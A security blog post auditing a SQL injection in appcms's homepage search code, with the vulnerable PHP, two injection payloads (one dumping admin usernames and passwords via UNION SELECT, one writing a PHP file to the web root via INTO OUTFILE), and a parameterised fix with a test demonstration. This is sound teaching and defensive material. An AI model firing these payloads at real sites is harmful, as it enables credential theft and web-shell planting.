p0's blog | 破 Focused on cybersecurity
appcms homepage SQL injection
Posted: | Category: Code audit | Comments: 0 | Views: 890

index.php

if (trim($_GET['q']) != '' && !isset($_GET['tpl'])) {
    $str = '';
    // $_GET['q'] is concatenated straight into the LIKE pattern: no escaping, no parameter binding
    $sql = "SELECT app_id,app_title,app_down FROM " . TB_PREFIX . "app_list WHERE app_title LIKE '%" . trim($_GET['q']) . "%' LIMIT 15";
    $app_list = $dbm->query($sql);
    if (count($app_list['list']) > 0) {
        foreach ($app_list['list'] as $k => $v) {
            // truncate each title to 20 characters before returning it as JSON
            $app_list['list'][$k]['app_title'] = helper::utf8_substr($v['app_title'], 0, 20);
        }
        echo json_encode($app_list['list']);
        exit;
    } else {
        exit;
    }
}

$_GET['q'] is passed straight into the query without escaping or parameter binding.

Constructed payload:
q=1%'union select 1,uname,upass from appcms_admin_list %23

The leading 1%' closes the '% that opens the LIKE pattern so the LIKE clause stays syntactically complete, the # (URL-encoded as %23) comments out the rest of the original statement, and the UNION SELECT returns the attacker-chosen rows.

The SQL statement becomes:
SELECT app_id,app_title,app_down FROM . TB_PREFIX . app_list WHERE app_title LIKE '%1%'union select 1,uname,upass from appcms_admin_list


Writing a shell:
q=1%'union select 1,2,'aaa' into outfile 'D:\\WWW\\a.php' %23

The statement becomes:
SELECT app_id,app_title,app_down FROM . TB_PREFIX . app_list WHERE app_title LIKE '%1%'union select 1,2,'aaa' into outfile 'D:\\WWW\\a.php'
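Both payloads above work only because the search term is concatenated into the SQL string. The following is an added example of how the block in index.php could be hardened; it is not appcms's own code or patch. It assumes a PDO connection (the page shows a custom $dbm wrapper whose API is not documented here), takes the table prefix as an argument where appcms would pass its TB_PREFIX constant, and uses the pdo_sqlite extension for a stand-alone in-memory demonstration with constructed table rows.

```php
<?php
// Added example, not appcms's own code: a parameterised rewrite of the
// search block from index.php, followed by an offline demonstration.

// Escape the LIKE metacharacters with '!' so user input is matched literally.
// '%' and '_' are LIKE wildcards; '!' is declared as the escape character in
// the query below. This form is portable across MySQL and SQLite.
function escape_like(string $s): string
{
    return str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $s);
}

// $prefix is a server-side constant (TB_PREFIX in appcms), never request data.
function search_apps(PDO $pdo, string $prefix, string $q, int $limit = 15): array
{
    $q = trim($q);
    if ($q === '') {
        return [];
    }

    // The user-controlled value is bound as a parameter, so a string such as
    // "1%'union select ..." is treated as a search term, not as SQL.
    $sql = 'SELECT app_id, app_title, app_down FROM ' . $prefix . 'app_list'
         . ' WHERE app_title LIKE :pattern ESCAPE \'!\' LIMIT ' . max(1, $limit);

    $stmt = $pdo->prepare($sql);
    $stmt->execute([':pattern' => '%' . escape_like($q) . '%']);

    $rows = $stmt->fetchAll(PDO::FETCH_ASSOC);
    foreach ($rows as &$row) {
        // Same 20-character truncation the original applies via helper::utf8_substr.
        $row['app_title'] = mb_substr((string) $row['app_title'], 0, 20, 'UTF-8');
    }
    unset($row);
    return $rows;
}

// --- Stand-alone demonstration on an in-memory SQLite database -------------
// Prefix, table layout and rows below are constructed for this example only.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE appcms_app_list (app_id INTEGER, app_title TEXT, app_down TEXT)');
$pdo->exec('CREATE TABLE appcms_admin_list (uname TEXT, upass TEXT)');
$pdo->exec("INSERT INTO appcms_app_list VALUES (1, 'Calculator', 'calc.apk'),
                                              (2, '100% Free Notes', 'notes.apk')");
$pdo->exec("INSERT INTO appcms_admin_list VALUES ('admin', 'hash-placeholder')");

// The injection string from the page, URL-decoded. Because it is bound as a
// parameter it is only a LIKE pattern; the admin table is never referenced.
$attack = "1%'union select 1,uname,upass from appcms_admin_list #";
echo json_encode(search_apps($pdo, 'appcms_', $attack)), "\n";

// A wildcard typed by a user is matched literally: this finds only the title
// that really contains a percent sign, not every row in the table.
echo json_encode(search_apps($pdo, 'appcms_', '%')), "\n";
```

Run against the constructed data, the first call returns an empty array and the second returns only the "100% Free Notes" row, which is the behaviour the original block should have had. Independently of the code fix, the INTO OUTFILE variant only succeeds when the database account holds MySQL's FILE privilege and secure_file_priv allows writing to the chosen path, so running the application under a least-privilege database account removes the file-write path even if another injection is found.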


Copyright belongs to the author.
For commercial reproduction, contact the author for authorization; for non-commercial reproduction, credit the source.
Author: p0
Link: http://p0sec.net/index.php/archives/11/
Source: http://p0sec.net/
